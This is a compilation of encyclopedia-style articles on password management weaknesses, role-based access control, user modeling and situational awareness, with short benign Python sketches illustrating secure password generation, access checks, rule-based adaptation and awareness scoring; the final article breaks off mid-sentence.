Generated passwords may be guessable if the password manager uses a weak method of randomly generating a "seed" for all passwords generated by the program. There are documented cases, like the one with Kaspersky Password Manager in 2021, where a flaw in the password generation method resulted in predictable passwords.[8][9] A 2014 paper by researchers at Carnegie Mellon University found that while browsers refuse to autofill passwords if the login page protocol differs from the one in use when the password was saved (HTTP vs. HTTPS), some password managers insecurely filled passwords into the unencrypted (HTTP) version of sites whose passwords had been saved over HTTPS. Additionally, most managers lacked protection against iframe- and redirection-based attacks, potentially exposing additional passwords when password synchronization was used across multiple devices.[10] Various high-profile websites have attempted to block password managers, often backing down when publicly challenged.[11][12][13] Reasons cited have included protecting against automated attacks, protecting against phishing, blocking malware, or simply denying compatibility. The Trusteer client security software from IBM features explicit options to block password managers.[14][15] Such blocking has been criticized by information security professionals as making users less secure.[13][15] The typical blocking implementation involves setting autocomplete='off' on the relevant password web form. This option is now consequently ignored on encrypted sites[10] by major browsers, such as Firefox 38,[16] Chrome 34,[17] and Safari from about version 7.0.2.[18] In recent years, some websites have made it harder for users to rely on password managers by disabling features like password autofill or blocking the ability to paste into password fields. Companies like T-Mobile, Barclaycard, and Western Union have implemented these restrictions, often citing security concerns such as malware prevention, phishing protection, or reducing automated attacks. However, cybersecurity experts have criticized these measures, arguing they can backfire by encouraging users to reuse weak passwords or rely on memory alone, ultimately making accounts more vulnerable. Some organizations, such as British Gas, have reversed these restrictions after public feedback, but the practice still persists on many websites.[19]
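The weak-seed failure mode discussed above can be contrasted with a generator built on a cryptographically secure random source. This short sketch uses Python's `secrets` module, which draws from the operating system's CSPRNG; the alphabet and length are arbitrary illustrative choices, not any product's policy.

```python
import secrets
import string

def generate_password(length: int = 20) -> str:
    """Generate a password from a CSPRNG rather than a time-seeded PRNG.

    Using secrets.choice avoids the pitfall of seeding a general-purpose
    PRNG with the current time, which can make every password generated
    in a given second predictable.
    """
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # prints one 20-character random password
```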
https://en.wikipedia.org/wiki/Password_management
In computer systems security, role-based access control (RBAC)[1][2] or role-based security[3] is an approach to restricting system access to authorized users, and to implementing mandatory access control (MAC) or discretionary access control (DAC). Role-based access control is a policy-neutral access control mechanism defined around roles and privileges. The components of RBAC, such as role-permissions, user-role and role-role relationships, make it simple to perform user assignments. A study by NIST has demonstrated that RBAC addresses many needs of commercial and government organizations.[4] RBAC can be used to facilitate administration of security in large organizations with hundreds of users and thousands of permissions. Although RBAC is different from the MAC and DAC access control frameworks, it can enforce these policies without any complication. Within an organization, roles are created for various job functions. The permissions to perform certain operations are assigned to specific roles. Since users are not assigned permissions directly, but only acquire them through their role (or roles), management of individual user rights becomes a matter of simply assigning appropriate roles to the user's account; this simplifies common operations, such as adding a user or changing a user's department. Three primary rules are defined for RBAC: role assignment (a subject can exercise a permission only if the subject has selected or been assigned a role), role authorization (a subject's active role must be authorized for the subject), and permission authorization (a subject can exercise a permission only if the permission is authorized for the subject's active role). Additional constraints may be applied as well, and roles can be combined in a hierarchy where higher-level roles subsume permissions owned by sub-roles. With the concepts of role hierarchy and constraints, one can control RBAC to create or simulate lattice-based access control (LBAC). Thus RBAC can be considered to be a superset of LBAC. When defining an RBAC model, conventions such as subject (S), role (R), permission (P), session (SE), subject assignment (SA), permission assignment (PA), and a partially ordered role hierarchy (RH) are useful. A constraint places a restrictive rule on the potential inheritance of permissions from opposing roles. Thus it can be used to achieve appropriate separation of duties. For example, the same person should not be allowed both to create a login account and to authorize the account creation; in set theory notation, the sets of subjects assigned to two such mutually exclusive roles must be disjoint. A subject may have multiple simultaneous sessions with/in different roles. The NIST/ANSI/INCITS RBAC standard (2004) recognizes three levels of RBAC: core RBAC, hierarchical RBAC, and constrained RBAC.[5] RBAC is a flexible access control technology whose flexibility allows it to implement DAC[6] or MAC.[7] DAC with groups (e.g., as implemented in POSIX file systems) can emulate RBAC.[8] MAC can simulate RBAC if the role graph is restricted to a tree rather than a partially ordered set.[9] Prior to the development of RBAC, the Bell-LaPadula (BLP) model was synonymous with MAC, and file system permissions were synonymous with DAC. These were considered to be the only known models for access control: if a model was not BLP, it was considered to be a DAC model, and vice versa. Research in the late 1990s demonstrated that RBAC falls in neither category.[10][11] Unlike context-based access control (CBAC), RBAC does not look at the message context (such as a connection's source). RBAC has also been criticized for leading to role explosion,[12] a problem in large enterprise systems which require access control of finer granularity than what RBAC can provide, as roles are inherently assigned to operations and data types.
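A minimal sketch of the rules just listed, with hypothetical role and permission names, might look as follows in Python; a production system would add role hierarchies, sessions, and constraints.

```python
# Minimal RBAC sketch: users acquire permissions only through roles.
ROLE_PERMISSIONS = {
    "teller": {"view_account", "credit_account"},
    "auditor": {"view_account", "view_audit_log"},
}
USER_ROLES = {
    "alice": {"teller"},
    "bob": {"auditor"},
}

def is_authorized(user: str, permission: str) -> bool:
    """Permission authorization: allowed only if some role assigned to
    the user (role assignment) carries the requested permission."""
    return any(
        permission in ROLE_PERMISSIONS.get(role, set())
        for role in USER_ROLES.get(user, set())
    )

assert is_authorized("alice", "credit_account")      # teller may post credits
assert not is_authorized("bob", "credit_account")    # auditor may only review
```

Note how adding a user or changing a department reduces to editing `USER_ROLES`, which is exactly the administrative simplification the text describes.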
In resemblance to CBAC, an entity-relationship based access control (ERBAC, although the same acronym is also used for modified RBAC systems,[13] such as extended role-based access control[14]) system is able to secure instances of data by considering their association to the executing subject.[15] Access control lists (ACLs) are used in traditional discretionary access-control (DAC) systems to affect low-level data objects. RBAC differs from ACL in assigning permissions to operations which change the direct relations between several entities (see: ACLg below). For example, an ACL could be used for granting or denying write access to a particular system file, but it wouldn't dictate how that file could be changed. In an RBAC-based system, an operation might be to 'create a credit account' transaction in a financial application or to 'populate a blood sugar level test' record in a medical application. A role is thus a sequence of operations within a larger activity. RBAC has been shown to be particularly well suited to separation of duties (SoD) requirements, which ensure that two or more people must be involved in authorizing critical operations. Necessary and sufficient conditions for safety of SoD in RBAC have been analyzed. An underlying principle of SoD is that no individual should be able to effect a breach of security through dual privilege. By extension, no person may hold a role that exercises audit, control or review authority over another, concurrently held role.[16][17] Then again, a "minimal RBAC model", RBACm, can be compared with an ACL mechanism, ACLg, where only groups are permitted as entries in the ACL. Barkley (1997)[18] showed that RBACm and ACLg are equivalent. In modern SQL implementations, like the ACL of the CakePHP framework, ACLs also manage groups and inheritance in a hierarchy of groups. Under this aspect, specific "modern ACL" implementations can be compared with specific "modern RBAC" implementations, better than "old (file system) implementations". For data interchange, and for "high level comparisons", ACL data can be translated to XACML. Attribute-based access control, or ABAC, is a model which evolves from RBAC to consider additional attributes in addition to roles and groups. In ABAC, it is possible to use attributes of the user, the resource being accessed, and the wider context of the request. ABAC is policy-based in the sense that it uses policies rather than static permissions to define what is allowed or what is not allowed. Relationship-based access control, or ReBAC, is a model which evolves from RBAC. In ReBAC, a subject's permission to access a resource is defined by the presence of relationships between those subjects and resources. The advantage of this model is that it allows for fine-grained permissions; for example, in a social network where users can share posts with other specific users.[19] The use of RBAC to manage user privileges (computer permissions) within a single system or application is widely accepted as a best practice.
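To illustrate the ReBAC idea in the social-network example above, here is a small, hypothetical sketch in which access is granted by checking for a relationship edge between subject and resource rather than by consulting a role.

```python
# ReBAC sketch: authorization follows relationship edges, not roles.
# (resource, relation, user) triples; all names are purely illustrative.
RELATIONSHIPS = {
    ("post_42", "owner", "carol"),
    ("post_42", "shared_with", "dave"),
}

def can_view(user: str, post: str) -> bool:
    """A user may view a post if they own it or it was shared with them."""
    return (
        (post, "owner", user) in RELATIONSHIPS
        or (post, "shared_with", user) in RELATIONSHIPS
    )

assert can_view("dave", "post_42")       # shared directly with dave
assert not can_view("erin", "post_42")   # no relationship, no access
```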
A 2010 report prepared for NIST by the Research Triangle Institute analyzed the economic value of RBAC for enterprises, and estimated benefits per employee from reduced employee downtime, more efficient provisioning, and more efficient access control policy administration.[20] In an organization with a heterogeneous IT infrastructure and requirements that span dozens or hundreds of systems and applications, using RBAC to manage sufficient roles and assign adequate role memberships becomes extremely complex without hierarchical creation of roles and privilege assignments.[21] Newer systems extend the older NIST RBAC model[22] to address the limitations of RBAC for enterprise-wide deployments. The NIST model was adopted as a standard by INCITS as ANSI/INCITS 359-2004. A discussion of some of the design choices for the NIST model has also been published.[23] Role-based access control interference is a relatively new issue in security applications, where multiple user accounts with dynamic access levels may lead to encryption key instability, allowing an outside user to exploit the weakness for unauthorized access. Key sharing applications within dynamic virtualized environments have shown some success in addressing this problem.[24]
https://en.wikipedia.org/wiki/Role-based_access_control
User modeling is the subdivision of human–computer interaction which describes the process of building up and modifying a conceptual understanding of the user. The main goal of user modeling is customization and adaptation of systems to the user's specific needs. The system needs to "say the 'right' thing at the 'right' time in the 'right' way".[1] To do so it needs an internal representation of the user. Another common purpose is modeling specific kinds of users, including modeling of their skills and declarative knowledge, for use in automatic software tests.[2] User models can thus serve as a cheaper alternative to user testing, but should not replace user testing. A user model is the collection and categorization of personal data associated with a specific user. A user model is a (data) structure that is used to capture certain characteristics about an individual user, and a user profile is the actual representation in a given user model. The process of obtaining the user profile is called user modeling.[3] Therefore, it is the basis for any adaptive changes to the system's behavior. Which data is included in the model depends on the purpose of the application. It can include personal information such as users' names and ages, their interests, their skills and knowledge, their goals and plans, their preferences and their dislikes, or data about their behavior and their interactions with the system. There are different design patterns for user models, though often a mixture of them is used.[2][4] Information about users can be gathered in several ways. There are three main methods: asking users directly for the data, for example through questionnaires during registration; learning the information by observing and interpreting the users' interactions with the system; and a hybrid approach combining both. Though the first method is a good way to quickly collect main data, it lacks the ability to automatically adapt to shifts in users' interests. It depends on the users' readiness to give information, and it is unlikely that they are going to edit their answers once the registration process is finished. Therefore, there is a high likelihood that the user models are not up to date. However, this first method allows the users to have full control over the data collected about them. It is their decision which information they are willing to provide. This possibility is missing in the second method. Adaptive changes in a system that learns users' preferences and needs only by interpreting their behavior might appear a bit opaque to the users, because they cannot fully understand and reconstruct why the system behaves the way it does.[5] Moreover, the system is forced to collect a certain amount of data before it is able to predict the users' needs with the required accuracy. Therefore, it takes a certain learning time before a user can benefit from adaptive changes. However, afterwards these automatically adjusted user models allow a quite accurate adaptivity of the system. The hybrid approach tries to combine the advantages of both methods. By collecting data through directly asking its users, it gathers a first stock of information which can be used for adaptive changes. By learning from the users' interactions, it can adjust the user models and reach more accuracy. Yet the designer of the system has to decide which of these pieces of information should have which amount of influence, and what to do with learned data that contradicts some of the information given by a user. Once a system has gathered information about a user, it can evaluate that data by preset analytical algorithms and then start to adapt to the user's needs. These adaptations may concern every aspect of the system's behavior and depend on the system's purpose.
Information and functions can be presented according to the user's interests, knowledge or goals by displaying only relevant features, hiding information the user does not need, making proposals about what to do next, and so on. One has to distinguish between adaptive and adaptable systems.[1] In an adaptable system the user can manually change the system's appearance, behavior or functionality by actively selecting the corresponding options. Afterwards the system will stick to these choices. In an adaptive system a dynamic adaptation to the user is automatically performed by the system itself, based on the built user model. Thus, an adaptive system needs ways to interpret information about the user in order to make these adaptations. One way to accomplish this task is implementing rule-based filtering. In this case a set of IF... THEN... rules is established that covers the knowledge base of the system.[2] The IF-conditions can check for specific user information, and if they match, the THEN-branch is performed, which is responsible for the adaptive changes. Another approach is based on collaborative filtering.[2][5] In this case information about a user is compared to that of other users of the same system. Thus, if characteristics of the current user match those of another, the system can make assumptions about the current user by presuming that he or she is likely to have similar characteristics in areas where the model of the current user is lacking data. Based on these assumptions the system then can perform adaptive changes. A certain number of representation formats and standards are available for representing users in computer systems.[8]
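As a minimal sketch of the rule-based filtering approach described above, the snippet below encodes IF... THEN... rules as condition/action pairs over a hypothetical user profile; the attribute names and adaptations are invented for illustration.

```python
# Rule-based filtering sketch: IF a condition on the user model holds,
# THEN apply the corresponding adaptive change to the interface.
user_model = {"expertise": "novice", "interests": {"photography"}}

RULES = [
    # (IF-condition over the user model, THEN-action producing a change)
    (lambda u: u["expertise"] == "novice",
     lambda ui: ui["show_tooltips"].append("enable step-by-step help")),
    (lambda u: "photography" in u["interests"],
     lambda ui: ui["featured_content"].append("new camera reviews")),
]

def adapt_interface(user: dict) -> dict:
    """Evaluate every rule and collect the adaptive changes it triggers."""
    ui_changes = {"show_tooltips": [], "featured_content": []}
    for condition, action in RULES:
        if condition(user):
            action(ui_changes)
    return ui_changes

print(adapt_interface(user_model))
```

A collaborative-filtering variant would instead compare `user_model` against the profiles of similar users and copy over characteristics where the current model lacks data.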
https://en.wikipedia.org/wiki/User_modeling
Situational awareness or situation awareness, often abbreviated as SA, is the understanding of an environment, its elements, and how it changes with respect to time or other factors. It is also defined as the perception of the elements in the environment considering time and space, the understanding of their meaning, and the prediction of their status in the near future.[1] It is also defined as adaptive, externally-directed consciousness focused on acquiring knowledge about a dynamic task environment and directed action within that environment.[2] Situation awareness is recognized as a critical foundation for successful decision making in many situations, including the ones which involve the protection of human life and property, such as law enforcement, aviation, air traffic control, ship navigation,[3] health care,[4] emergency response, military command and control operations, transmission system operators, self defense,[5] and offshore oil and nuclear power plant management.[6] Inadequate situation awareness has been identified as one of the primary causal factors in accidents attributed to human error.[7][8][9][10] According to Endsley's situation awareness theory, when someone meets a dangerous situation, they need an appropriate and precise decision-making process which includes pattern recognition and matching, formation of sophisticated frameworks, and fundamental knowledge that aids correct decision making.[11] The formal definition of situational awareness is often described as three ascending levels: perception of the elements in the environment, comprehension of the situation, and projection of future status. People with the highest levels of situational awareness not only perceive the relevant information for their goals and decisions, but are also able to integrate that information to understand its meaning or significance, and are able to project likely or possible future scenarios. These higher levels of situational awareness are critical for proactive decision making in demanding environments. Three aspects of situational awareness have been the focus in research: situational awareness states, situational awareness systems, and situational awareness processes. Situational awareness states refers to the actual level of awareness people have of the situation. Situational awareness systems refers to technologies that are developed to support situational awareness in many environments. Situational awareness processes refers to the updating of situational awareness states, and what guides the moment-to-moment change of situational awareness.[13] Although the term itself is fairly recent, the concept has roots in the history of military theory; it is recognizable in Sun Tzu's The Art of War, for example.[14] The term can be traced to World War I, where it was recognized as a crucial skill for crews in military aircraft.[15] There is evidence that the term situational awareness was first employed at the Douglas Aircraft Company during human factors engineering research while developing vertical and horizontal situation displays and evaluating digital-control placement for the next generation of commercial aircraft.
Research programs in flight-crew computer interaction[16] and mental workload measurement[17] built on the concept of awareness measurement from a series of experiments that measured contingency awareness during learning,[18][19] and later extended to mental workload and fatigue.[20] Situation awareness appears in the technical literature as early as 1983, when describing the benefits of a prototype touch-screen navigation display.[21] During the early 1980s, integrated "vertical-situation" and "horizontal-situation" displays were being developed for commercial aircraft to replace multiple electro-mechanical instruments. Integrated situation displays combined the information from several instruments, enabling more efficient access to critical flight parameters, thereby improving situational awareness and reducing pilot workload. The term was first defined formally by Endsley in 1988.[22] Before being widely adopted by human factors scientists in the 1990s, the term is said to have been used by United States Air Force (USAF) fighter aircrew returning from war in Korea and Vietnam.[23] They identified having good SA as the decisive factor in air combat engagements: the "ace factor".[24] Survival in a dogfight was typically a matter of observing the opponent's current move and anticipating his next move a fraction of a second before he could observe and anticipate it himself. USAF pilots also came to equate SA with the "observe" and "orient" phases of the famous observe-orient-decide-act loop (OODA loop), or Boyd cycle, as described by the USAF war theorist Col. John Boyd. In combat, the winning strategy is to "get inside" your opponent's OODA loop, not just by making one's own decisions quicker, but also by having better SA than one's opponent, and even changing the situation in ways that the opponent cannot monitor or even comprehend. Losing one's own SA, in contrast, equates to being "out of the loop". Clearly, SA has far-reaching applications, as it is necessary for individuals and teams to function effectively in their environment. Thus, SA has gone far beyond the field of aviation to work being conducted in a wide variety of environments. SA is being studied in such diverse areas as air traffic control, nuclear power plant operation, emergency response, maritime operations, space, oil and gas drilling, vehicle operation, and health care (e.g. anesthesiology and nursing).[25][26][27][28][29][30][31] The most widely cited and accepted model of SA was developed by Dr. Mica Endsley,[25] and has been shown to be largely supported by research findings.[34] Lee, Cassano-Pinche, and Vicente found that Endsley's model of SA received 50% more citations following its publication than any other paper in Human Factors in the 30-year period of their review.[35] Endsley's model describes the cognitive processes and mechanisms that are used by people to assess situations to develop SA, and the task and environmental factors that also affect their ability to get SA. It describes in detail the three levels of SA formation: perception, comprehension, and projection. Perception (Level 1 SA): The first step in achieving SA is to perceive the status, attributes, and dynamics of relevant elements in the environment.
Thus, Level 1 SA, the most basic level of SA, involves the processes of monitoring, cue detection, and simple recognition, which lead to an awareness of multiple situational elements (objects, events, people, systems, environmental factors) and their current states (locations, conditions, modes, actions). Comprehension (Level 2 SA): The next step in SA formation involves a synthesis of disjointed Level 1 SA elements through the processes of pattern recognition, interpretation, and evaluation. Level 2 SA requires integrating this information to understand how it will impact upon the individual's goals and objectives. This includes developing a comprehensive picture of the world, or of that portion of the world of concern to the individual. Projection (Level 3 SA): The third and highest level of SA involves the ability to project the future actions of the elements in the environment. Level 3 SA is achieved through knowledge of the status and dynamics of the elements and comprehension of the situation (Levels 1 and 2 SA), and then extrapolating this information forward in time to determine how it will affect future states of the operational environment. Endsley's model shows how SA "provides the primary basis for subsequent decision making and performance in the operation of complex, dynamic systems".[36] Although alone it cannot guarantee successful decision making, SA does support the necessary input processes (e.g., cue recognition, situation assessment, prediction) upon which good decisions are based.[37] SA also involves both a temporal and a spatial component. Time is an important concept in SA, as SA is a dynamic construct, changing at a tempo dictated by the actions of individuals, task characteristics, and the surrounding environment. As new inputs enter the system, the individual incorporates them into this mental representation, making changes as necessary in plans and actions in order to achieve the desired goals. SA also involves spatial knowledge about the activities and events occurring in a specific location of interest to the individual. Thus, the concept of SA includes perception, comprehension, and projection of situational information, as well as temporal and spatial components. Endsley's model of SA illustrates several variables that can influence the development and maintenance of SA, including individual, task, and environmental factors. In summary, the model consists of several key factors that describe the cognitive processes involved in SA.[38] The model also points to a number of features of the task and environment that affect SA. Experience and training have a significant impact on people's ability to develop SA, due to their impact on the development of mental models that reduce processing demands and help people to better prioritize their goals.[40] In addition, it has been found that individuals vary in their ability to acquire SA; thus, simply providing the same system and training will not ensure similar SA across different individuals. Research has shown that there are a number of factors that make some people better at SA than others, including differences in spatial abilities and multi-tasking skills.[41] Criticisms of the SA construct and the model have generally been addressed and are viewed as unfounded.[42][43][44] The Endsley model is very detailed in describing the exact cognitive processes involved in SA. A narrative literature review of SA, performance, and other human factors constructs states that SA "...
is valuable in understanding and predicting human-system performance in complex systems."[42] Nevertheless, there are several criticisms of SA. One criticism is the danger of circularity with SA: "How does one know that SA was lost? Because the human responded inappropriately. Why did the human respond inappropriately? Because SA was lost."[45] Building on the circularity concern, others deemed SA a folk model on the basis that it is frequently overgeneralized and immune to falsification.[46][47] A response to these criticisms argues that measures of SA are "... falsifiable in terms of their usefulness in prediction."[42] A recent review and meta-analysis of SA measures showed they were highly correlated with or predictive of performance, which initially appears to provide strong quantitative evidence refuting criticisms of SA.[44] However, the inclusion criteria in this meta-analysis[44] were limited to positive correlations reaching desirable levels of statistical significance.[48] That is, the more desirable, hypothesis-supporting results were included, while the less desirable results, contradicting the hypothesis, were excluded. The justification was "Not all measures of SA are relevant to performance."[44] This is an example of a circular analysis, or double-dipping,[49] where the dataset being analyzed is selected based on the outcome of analyzing the same dataset. Because only the more desirable effects were included, the results of this meta-analysis were predetermined: predictive measures of SA were found to be predictive.[48] Further, there were inflated estimates of mean effect sizes compared to an analysis that did not select results using statistical significance.[48] Determining the relevance of SA based on the desirability of outcomes and analyzing only supporting results is a circular conceptualization of SA and revives concerns about the falsifiability of SA.[48] Several cognitive processes related to situation awareness are briefly described in this section. The matrix shown below attempts to illustrate the relationship among some of these concepts.[50] Note that situation awareness and situational assessment are more commonly discussed in information-fusion complex domains such as aviation and military operations and relate more to achieving immediate tactical objectives.[51][52][53] Sensemaking and achieving understanding are more commonly found in industry and the organizational psychology literature and often relate to achieving long-term strategic objectives. There are also biological mediators of situational awareness, most notably hormones such as testosterone, and neurotransmitters such as dopamine and norepinephrine.[54] Situation awareness is sometimes confused with the term "situational understanding." In the context of military command and control applications, situational understanding refers to the "product of applying analysis and judgment to the unit's situation awareness to determine the relationships of the factors present and form logical conclusions concerning threats to the force or mission accomplishment, opportunities for mission accomplishment, and gaps in information".[55] Situational understanding is the same as Level 2 SA in the Endsley model: the comprehension of the meaning of the information as integrated with each other and in terms of the individual's goals. It is the "so what" of the data that is perceived. In brief, situation awareness is viewed as "a state of knowledge," and situational assessment as "the processes" used to achieve that knowledge.
Endsley argues that "it is important to distinguish the term situation awareness, as a state of knowledge, from the processes used to achieve that state.[1] These processes, which may vary widely among individuals and contexts, will be referred to as situational assessment or the process of achieving, acquiring, or maintaining SA." Note that SA is not only produced by the processes of situational assessment; it also drives those same processes in a recurrent fashion. For example, one's current awareness can determine what one pays attention to next and how one interprets the information perceived.[56] Accurate mental models are one of the prerequisites for achieving SA.[22][57][58] A mental model can be described as a set of well-defined, highly organized yet dynamic knowledge structures developed over time from experience.[59][60] The volume of available data inherent in complex operational environments can overwhelm the capability of novice decision makers to attend to, process, and integrate this information efficiently, resulting in information overload and negatively impacting their SA.[61] In contrast, experienced decision makers assess and interpret the current situation (Level 1 and 2 SA) and select an appropriate action based on conceptual patterns stored in their long-term memory as "mental models".[62][63] Cues in the environment activate these mental models, which in turn guide their decision-making process. Klein, Moon, and Hoffman distinguish between situation awareness and sensemaking as follows: "...situation awareness is about the knowledge state that's achieved—either knowledge of current data elements, or inferences drawn from these data, or predictions that can be made using these inferences. In contrast, sensemaking is about the process of achieving these kinds of outcomes, the strategies, and the barriers encountered."[64] In brief, sensemaking is viewed more as "a motivated, continuous effort to understand connections (which can be among people, places, and events) in order to anticipate their trajectories and act effectively",[65] rather than the state of knowledge underlying situation awareness. Endsley points out that, as an effortful process, sensemaking actually covers a subset of the processes used to maintain situation awareness.[66][43] In the vast majority of cases, SA is instantaneous and effortless, proceeding from pattern recognition of key factors in the environment: "The speed of operations in activities such as sports, driving, flying and air traffic control practically prohibits such conscious deliberation in the majority of cases, but rather reserves it for the exceptions." Endsley also points out that sensemaking is backward-focused, forming reasons for past events, while situation awareness is typically forward-looking, projecting what is likely to happen in order to inform effective decision processes.[66][43] In many systems and organizations, people work not just as individuals, but as members of a team. Thus, it is necessary to consider the SA of not just individual team members, but also the SA of the team as a whole. To begin to understand what is needed for SA within teams, it is first necessary to clearly define what constitutes a team. A team is not just any group of individuals; rather, teams have a few defining characteristics.
A team is: a distinguishable set of two or more people who interact dynamically, interdependently and adaptively toward a common and valued goal/objective/mission, who have each been assigned specific roles or functions to perform, and who have a limited life span of membership. Team SA is defined as "the degree to which every team member possesses the SA required for his or her responsibilities".[38] The success or failure of a team depends on the success or failure of each of its team members. If any one of the team members has poor SA, it can lead to a critical error in performance that can undermine the success of the entire team. By this definition, each team member needs to have a high level of SA on those factors that are relevant for his or her job. It is not sufficient for one member of the team to be aware of critical information if the team member who needs that information is not aware. Therefore, team members need to be successful in communicating information between them (including how they are interpreting or projecting changes in the situation to form Level 2 and 3 SA) or in each independently being able to get the information they need. In a team, each member has a subgoal pertinent to his or her specific role that feeds into the overall team goal. Associated with each member's subgoal is a set of SA elements about which he or she is concerned. As the members of a team are essentially interdependent in meeting the overall team goal, some overlap between each member's subgoal and their SA requirements will be present. It is this subset of information that constitutes much of team coordination. That coordination may occur as a verbal exchange, a duplication of displayed information, or by some other means.[68] Shared situation awareness can be defined as "the degree to which team members possess the same SA on shared SA requirements".[69][70] As implied by this definition, there are information requirements that are relevant to multiple team members. A major part of teamwork involves the area where these SA requirements overlap: the shared SA requirements that exist as a function of the essential interdependency of the team members. In a poorly functioning team, two or more members may have different assessments on these shared SA requirements and thus behave in an uncoordinated or even counter-productive fashion. Yet in a smoothly functioning team, each team member shares a common understanding of what is happening on those SA elements that are common: shared SA. Thus, shared SA refers to the degree to which people have a common understanding of the information that lies in the overlap of the SA requirements of the team members. Not all information needs to be shared. Clearly, each team member is aware of much that is not pertinent to the others on the team. Sharing every detail of each person's job would create information overload to sort through to get needed information.[71][72] It is only that information which is relevant to the SA requirements of each team member that needs to be shared.
The situation awareness of the team as a whole, therefore, is dependent upon both a high level of SA among individual team members for the aspects of the situation necessary for their job, and a high level of shared SA between team members, providing an accurate common operating picture of those aspects of the situation common to the needs of each member.[73] Endsley and Jones[57][73] describe a model of team situation awareness as a means of conceptualizing how teams develop high levels of shared SA across members. Each of these four factors (requirements, devices, mechanisms and processes) acts to help build team and shared SA. In time-critical decision-making processes, swift and effective choices are imperative to address and navigate urgent situations. In such scenarios, the ability to analyze information rapidly, prioritize key factors, and execute decisions promptly becomes paramount. Time constraints often necessitate a balance between thorough deliberation and the need for quick action. The decision-maker must rely on a combination of experience, intuition, and available data to make informed choices under pressure. Prioritizing critical elements, assessing potential outcomes, and considering the immediate and long-term consequences are crucial aspects of effective time-critical decision-making. Furthermore, clear communication is essential to ensure that decisions are swiftly conveyed to relevant stakeholders and executed seamlessly. Collaborative efforts, streamlined processes, and well-defined protocols can enhance the efficiency of decision-making in time-sensitive situations. Adaptability and the ability to recalibrate strategies in real time are vital attributes in time-critical scenarios, as unforeseen developments may require rapid adjustments to the initial decision. Embracing technological advancements and data-driven insights, and incorporating simulation exercises, can also contribute to better decision-making outcomes in high-pressure situations. Ultimately, successful time-critical decision-making involves a combination of expertise, preparedness, effective communication, and a willingness to adapt, ensuring that the chosen course of action aligns with the urgency of the situation while minimizing the risk of errors. While the SA construct has been widely researched, the multivariate nature of SA poses a considerable challenge to its quantification and measurement.[a] In general, techniques vary in terms of direct measurement of SA (e.g., objective real-time probes or subjective questionnaires assessing perceived SA) or methods that infer SA based on operator behavior or performance. Direct measures are typically considered to be "product-oriented" in that these techniques assess an SA outcome; inferred measures are considered to be "process-oriented," focusing on the underlying processes or mechanisms required to achieve SA.[74] These SA measurement approaches are further described next. Objective measures directly assess SA by comparing an individual's perceptions of the situation or environment to some "ground truth" reality. Specifically, objective measures collect data from the individual on his or her perceptions of the situation and compare them to what is actually happening, in order to score the accuracy of their SA at a given moment in time. Thus, this type of assessment provides a direct measure of SA and does not require operators or observers to make judgments about situational knowledge on the basis of incomplete information.
Objective measures can be gathered in one of three ways: in real time as the task is completed (e.g., "real-time probes" presented as open questions embedded as verbal communications during the task[75]), during an interruption in task performance (e.g., the situation awareness global assessment technique (SAGAT),[32] or the WOMBAT situational awareness and stress tolerance test, mostly used in aviation since the late 1980s and often called HUPEX in Europe), or post-test following completion of the task. Subjective measures directly assess SA by asking individuals to rate their own SA, or the observed SA of other individuals, on an anchored scale (e.g., the participant situation awareness questionnaire;[76] the situation awareness rating technique[77]). Subjective measures of SA are attractive in that they are relatively straightforward and easy to administer. However, several limitations should be noted. Individuals making subjective assessments of their own SA are often unaware of information they do not know (the unknown unknowns). Subjective measures also tend to be global in nature and, as such, do not fully exploit the multivariate nature of SA to provide the detailed diagnostics available with objective measures. Nevertheless, self-ratings may be useful in that they can provide an assessment of operators' degree of confidence in their SA and their own performance. Measuring how SA is perceived by the operator may provide information as important as the operator's actual SA, since errors in perceived SA quality (over-confidence or under-confidence in SA) may have just as harmful an effect on an individual's or team's decision-making as errors in their actual SA.[78] Subjective estimates of an individual's SA may also be made by experienced observers (e.g., peers, commanders, or trained external experts). These observer ratings may be somewhat superior to self-ratings of SA because more information about the true state of the environment is usually available to the observer than to the operator, who may be focused on performing the task (i.e., trained observers may have more complete knowledge of the situation). However, observers have only limited knowledge about the operator's concept of the situation and cannot have complete insight into the mental state of the individual being evaluated. Thus, observers are forced to rely more on operators' observable actions and verbalizations in order to infer their level of SA. In this case, such actions and verbalizations are best assessed using performance and behavioral measures of SA, as described next. Performance measures infer SA from the end result (i.e., task performance outcomes), based on the assumption that better performance indicates better SA. Common performance metrics include quantity of output or productivity level, time to perform the task or respond to an event, and the accuracy of the response or, conversely, the number of errors committed. The main advantage of performance measures is that these can be collected objectively and without disrupting task performance. However, although evidence exists to suggest a positive relation between SA and performance, this connection is probabilistic and not always direct and unequivocal.[25] In other words, good SA does not always lead to good performance, and poor SA does not always lead to poor performance.[79] Thus, performance measures should be used in conjunction with other measures of SA that directly assess this construct.
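As an illustrative sketch of the objective, ground-truth comparison described above (as in SAGAT-style freeze probes), the snippet below scores an operator's probe answers against the true simulation state; the query names, values, and tolerances are invented purely for the example.

```python
# Illustrative SAGAT-style scoring: compare an operator's answers to
# freeze-probe queries against the simulation's ground-truth state.
ground_truth = {"nearest_aircraft_bearing_deg": 240, "own_altitude_ft": 12000}
operator_answers = {"nearest_aircraft_bearing_deg": 250, "own_altitude_ft": 9000}
tolerances = {"nearest_aircraft_bearing_deg": 15, "own_altitude_ft": 500}

def sa_accuracy(truth: dict, answers: dict, tol: dict) -> float:
    """Fraction of probe questions answered within tolerance of reality."""
    correct = sum(
        abs(answers[query] - value) <= tol[query]
        for query, value in truth.items()
    )
    return correct / len(truth)

print(sa_accuracy(ground_truth, operator_answers, tolerances))  # 0.5
```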
Behavioral measures also infer SA from the actions that individuals choose to take, based on the assumption that good actions will follow from good SA and vice versa. Behavioral measures rely primarily on observer ratings and are, thus, somewhat subjective in nature. To address this limitation, observers can be asked to evaluate the degree to which individuals are carrying out actions and exhibiting behaviors that would be expected to promote the achievement of higher levels of SA.[b] This approach removes some of the subjectivity associated with making judgments about an individual's internal state of knowledge by allowing observers to make judgments about SA indicators that are more readily observable. Process indices examine how individuals process information in their environment, such as by analyzing communication patterns between team members or using eye tracking devices. Team communication (particularly verbal communication) supports the knowledge building and information processing that leads to SA construction.[57] Thus, since SA may be distributed via communication, computational linguistics and machine learning techniques can be combined with natural language analytical techniques (e.g., latent semantic analysis) to create models that draw on the verbal expressions of the team to predict SA and task performance.[81][82] Although evidence exists to support the utility of communication analysis for predicting team SA,[83] time constraints and technological limitations (e.g., the cost and availability of speech recording systems and speech-to-text translation software) may make this approach less practical and viable in time-pressured, fast-paced operations. Psycho-physiological measures also serve as process indices of operator SA by providing an 